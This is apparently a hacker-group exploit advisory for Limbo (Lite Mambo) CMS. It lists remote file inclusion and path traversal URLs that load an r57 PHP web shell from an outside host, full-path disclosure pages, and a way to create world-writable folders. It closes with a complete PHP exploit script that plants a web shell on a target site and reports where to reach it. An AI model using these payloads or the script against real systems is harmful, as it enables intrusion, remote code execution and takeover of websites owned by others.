Hello Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including - Full path - make php shell - and create folder with 0777 permissions) Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : security@xxxxxxxxx /*******************************************************/ Remote File Including classes/adodbt/sql.php?classes_dir=http://www.soqor.net/tools/r57.txt? /*******************************************************/ Make online php shell admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://www.soqor.net/tools/r57.txt? or :- components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt? the shell link will be : admin/components/com_fm/lang/fm.english.php /*******************************************************/ Full Path :- includes/metadata.php editor/tiny_mce/plugins/imanager/imanager.php components/com_fm/fm.install.php admin/auth.php admin/components/com_fm/fm.install.php admin/components/com_gallery/gallery.install.php admin/components/com_start/admin.start.news.php admin/components/com_start/admin.start.html.php?lm_absolute_path=../../../ it can be usefull in the fallowing vulnerabilities /*******************************************************/ Create A new Folder With 0777 Permission - - + You Can Change the link and create your own folders ,, see the source code .. admin/components/com_gallery/gallery.install.php?absolute_path=../../../ File dir: images/gallery/thumbs/ admin/components/com_gositemap/gositemap.install.php?lm_absolute_path=../../ File dir: admin/feed admin/components/com_sitemap/sitemap.install.php?lm_absolute_path=../ File dir: admin/components/feed /*******************************************************/ WwW.SoQoR.NeT Exploit:- [code] #!/usr/bin/php -q -d short_open_tag=on <? /* /* Limbo Portal Multiple vulnerabilities /* This exploit should Create a PHP shell /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* Limbo Portal Creat PHP shell exploit */ /* by HACKERS PAL <security@xxxxxxxxx> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); $url=$argv[1]; $exploit="components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt?"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($page); if(!eregi("Warning",$page)) { Die("\n[+] Exploit Finished\n[+] Go To : ".$url."admin/components/com_fm/lang/fm.english.php\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } Else { Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } ?> [/code]